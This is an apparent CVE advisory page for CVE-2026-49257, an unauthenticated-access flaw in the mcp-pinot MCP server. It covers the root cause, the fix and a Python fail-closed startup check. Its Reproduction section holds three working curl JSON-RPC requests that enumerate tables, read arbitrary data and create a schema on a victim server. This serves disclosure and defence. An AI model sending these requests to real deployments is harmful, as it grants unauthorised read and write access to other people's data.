VYPR
Unrated severity · NVD Advisory · Published Jun 18, 2026

mcp-pinot: Unauthenticated tool invocation via default oauth_enabled=False + host 0.0.0.0 bind

CVE-2026-49257

Description

mcp-pinot is a Python-based Model Context Protocol (MCP) server for interacting with Apache Pinot. In versions 3.0.1 and below, mcp-pinot defaults to running an HTTP MCP server bound to 0.0.0.0:8080 with no authentication enabled. All MCP tools, including SQL query execution, schema creation, and table-config mutation, are reachable by any network-adjacent caller. The server proxies these calls using server-side Pinot credentials, producing a confused-deputy condition that yields full read/write access to the configured Pinot cluster. This issue has been fixed in version 3.1.0.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"Default configuration binds an unauthenticated HTTP MCP server to 0.0.0.0:8080, allowing any network-adjacent caller to invoke all tools via the server's privileged Pinot credentials (confused-deputy)."

Attack vector

An attacker on the network sends a direct HTTP POST request to the MCP server's default endpoint (`http://victim:8080/mcp`) with a JSON-RPC payload invoking any MCP tool — for example, `list_tables` or `read_query`. Because the server binds to `0.0.0.0:8080` and OAuth is disabled by default, no authentication is required. The server then proxies the request to the upstream Pinot cluster using its own privileged service-account credentials, creating a confused-deputy condition [ref_id=1]. This gives the attacker full read/write access to the Pinot cluster, including SQL query execution, schema creation, and table-config mutation.

Affected code

The vulnerability resides in `mcp_pinot/server.py` and `mcp_pinot/config.py`. The default `ServerConfig` sets `oauth_enabled=False` and binds the HTTP server to `0.0.0.0:8080`, while authentication construction is gated by `oauth_enabled` — when it is `False`, `_auth` stays `None` and all 14 MCP tool endpoints are registered without authentication.

What the fix does

The fix [ref_id=2][ref_id=3] changes the default HTTP bind host to `127.0.0.1` and adds a fail-closed check in `main()`: the server refuses to start if the transport is HTTP, OAuth is disabled, and the host is not a loopback address. Helm defaults are made local-only (no Service), and any non-loopback Kubernetes exposure requires OAuth. Additionally, the `read-query` tool now enforces parser-backed, single-statement read-only SQL validation using `sqlglot`, rejecting stacked statements and write/DDL/admin keywords. These changes eliminate the unauthenticated network exposure and the confused-deputy condition.
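A sketch of the fail-closed startup check described above, as an added example and not mcp-pinot's own code. `ServerConfig` here is a hypothetical stand-in, and the function names, the `transport` values and the acceptance of the name `localhost` are assumptions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class ServerConfig:
    # Hypothetical stand-in for the project's config; defaults are the fixed ones.
    transport: str = "http"  # assumed values: "http" or "stdio"
    host: str = "127.0.0.1"
    port: int = 8080
    oauth_enabled: bool = False


def is_loopback_host(host: str) -> bool:
    """True only if a listener bound to `host` is reachable from this machine alone."""
    host = host.strip().strip("[]").lower()
    if host == "localhost":  # assumption: the name resolves to loopback
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Empty string or any other hostname: cannot prove loopback, so deny.
        return False
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) before testing.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    return addr.is_loopback  # False for the wildcards 0.0.0.0 and ::


def check_startup(cfg: ServerConfig) -> None:
    """Fail closed: refuse an unauthenticated HTTP listener off loopback."""
    if cfg.transport != "http":
        return  # assumed: non-HTTP transports open no network socket
    if cfg.oauth_enabled or is_loopback_host(cfg.host):
        return
    raise SystemExit(
        f"refusing to start: HTTP on {cfg.host}:{cfg.port} without OAuth; "
        "bind to 127.0.0.1 or enable OAuth"
    )


def would_start(cfg: ServerConfig) -> bool:
    """Helper for checking a configuration without exiting the process."""
    try:
        check_startup(cfg)
    except SystemExit:
        return False
    return True
```

Calling `check_startup` before the listener is created means the vulnerable combination (HTTP, no OAuth, wildcard bind) stops the process instead of serving requests.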

Preconditions

  • config: The mcp-pinot server must be running with default configuration (oauth_enabled=False, host=0.0.0.0, port=8080).
  • network: The attacker must have network access to the server's HTTP endpoint (any network-adjacent position).
  • auth: No authentication credentials are required; the server proxies requests using its own privileged Pinot credentials.
  • input: The attacker sends a single HTTP POST request with a JSON-RPC payload invoking any MCP tool.

Reproduction

```bash
# 1. Enumerate tables (no Authorization header)
curl -X POST http://victim:8080/mcp \
  -H 'Content-Type: application/json' \
  -d '{
    "jsonrpc":"2.0",
    "method":"tools/call",
    "params":{"name":"list_tables","arguments":{}},
    "id":1
  }'

# 2. Read arbitrary table contents (server forwards using its own Pinot credentials)
curl -X POST http://victim:8080/mcp \
  -H 'Content-Type: application/json' \
  -d '{
    "jsonrpc":"2.0",
    "method":"tools/call",
    "params":{
      "name":"read_query",
      "arguments":{"query":"SELECT * FROM <table> LIMIT 100"}
    },
    "id":2
  }'

# 3. Create a new schema (write privileges)
curl -X POST http://victim:8080/mcp \
  -H 'Content-Type: application/json' \
  -d '{
    "jsonrpc":"2.0",
    "method":"tools/call",
    "params":{
      "name":"create_schema",
      "arguments":{
        "schemaJson":"{\"schemaName\":\"attacker_schema\",\"dimensionFieldSpecs\":[{\"name\":\"id\",\"dataType\":\"STRING\"}]}"
      }
    },
    "id":3
  }'
```

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4
